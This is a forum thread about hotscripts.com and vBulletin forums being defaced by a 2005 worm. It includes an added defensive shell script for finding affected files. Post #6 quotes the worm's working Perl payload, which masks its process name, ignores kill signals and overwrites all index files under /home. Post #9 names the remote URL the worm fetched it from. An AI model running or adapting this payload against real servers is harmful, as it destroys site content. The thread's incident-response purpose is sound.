hotscripts hacked


  • hotscripts hacked

    http://hotscripts.com/ hacked

  • #2
    What bad luck.

    Doesn't surprise me with the amount of people Inet (Communitech) have pissed off over the years.
    http://forums.cpfc.org/


    • #3
      Originally posted by Dave#
      What bad luck.

      Doesn't surprise me with the amount of people Inet (Communitech) have pissed off over the years.
      This was not a direct hack. It was a worm type virus. I'm afraid that's all I can post but I'm sure you'll hear more about this worm in the coming days.

      Also I work for iNET and I didn't work for Communitech


      • #4
        Seems to be good now.


        • #5
          Also I work for iNET and I didn't work for Communitech
          Whatever, Inet are just Communitech under another name.

          Personally I would find it difficult to work for people like that.
          http://forums.cpfc.org/


          • #6
            I am not a PHP expert but was it this?
            PHP Code:
              #!/usr/bin/perl

              my $processo "/usr/local/sbin/httpd - spy";

              $SIG{"INT"} = "IGNORE";
              $SIG{"HUP"} = "IGNORE";
              $SIG{"TERM"} = "IGNORE";
              $SIG{"CHLD"} = "IGNORE";
              $SIG{"PS"} = "IGNORE";

              $0="$processo"."\0"x16;;
              my $pid=fork;
              exit if $pid;
              die "Problema com o fork: $!" unless defined($pid);

              system("find /home -name index.* >> index");

              open(a,"<index");
              @ind = <a>;
              close(a);
              $b scalar(@ind)
              for($a=0;$a<=$b;$a++){
              chomp;
              system("echo spykids ownz your server > $ind[$a]");
              }

              system("perl zone.txt");
              exit;
            If it's not suitable here, please delete. Thanks.


            • #7
              That's PERL not PHP, and it appears to search and replace all index files in /home with the "spykids" text. Script kiddies, from South America, at a guess.

              Comment
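
Added example, not part of any post in this thread: a POSIX shell triage sketch for a server that may have been hit, built only from the indicators visible in the script quoted in post #6 (the defacement text, the `index` and `zone.txt` working files, and the process name written into `$0`). The function names are hypothetical, and the search root is an assumption to adjust per host.

```shell
#!/bin/sh
# Added triage example; indicators come from the script quoted in post #6.
# Function names are hypothetical, not from any tool.

MARKER='spykids ownz your server'         # text the script echoes into files
FAKE_PROC='/usr/local/sbin/httpd - spy'   # name the script assigns to $0

# List index.* files under a root (the script targets /home) that contain
# the defacement text. One path per line; empty output means none found.
find_defaced() {
    root=${1:-/home}
    find "$root" -type f -name 'index.*' \
        -exec grep -l -F -- "$MARKER" {} + 2>/dev/null | sort
}

# List leftover working files: the script appends its target list to a file
# named "index" and then runs "zone.txt". Where it was run from is not
# stated in the thread, so the root to search is an assumption.
find_droppings() {
    root=${1:-/home}
    find "$root" -type f \( -name index -o -name zone.txt \) 2>/dev/null | sort
}

# Read process-list lines on stdin and print those showing the masqueraded
# name. Substring match, because the script appends padding to the name.
match_fake_proc() {
    grep -F -- "$FAKE_PROC"
}

# Typical use on a live host:
#   find_defaced /home
#   find_droppings /home
#   ps axww -o pid,user,args | match_fake_proc
```

Files listed by `find_defaced` were overwritten, not appended to, so they need restoring from backup rather than cleaning.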


              • #8
                It was indeed that. One of my servers got hit...


                • #9
                  Don't click this link, but here is where the worm got the script from:

                  compras.el-nacional.com/spykids.txt

                  I suggest a safe wget or something else like that.


                  • #10
                    Also, here is what the access log call looks like:

                    -- Removed - Contact me if needed. ;-)

                    Note that I am / was still using 3.0.3, so it is possible / probable the upgrade to 3.0.7 fixes this ??
                    Last edited by dictionaryof; Sun 6th Mar '05, 10:15am.


                    • #11
                      Note that I am / was still using 3.0.3, so it is possible / probable the upgrade to 3.0.7 fixes this ??
                      Yes. Or if you didn't have "Add Template Name in Comments" enabled.


                      • #12
                        Some have an irc left there me goes to look

                        Spykids ownz you!! irc.brasnet.org //j #spy [email protected]


                        • #13
                          Originally posted by Mike Sullivan
                          Yes. Or if you didn't have "Add Template Name in Comments" enabled.
                          We had/have it disabled on all of our forums and yet one still got hit by this worm.....


                          • #14
                            I've reported posts in this thread several times, but publicly posting exactly how to exploit vulnerabilities in public is not very smart. That server log shows every Tom, Dick and Harry how to exploit it.
                            Dean Clatworthy - Web Developer/Designer


                            • #15
                              log lines removed.

                              Can someone confirm that the upgrade to 3.0.7 will prevent this from re-occurring...

                              The upgrade has been completed, but don't want to reopen the forum til it is confirmed.
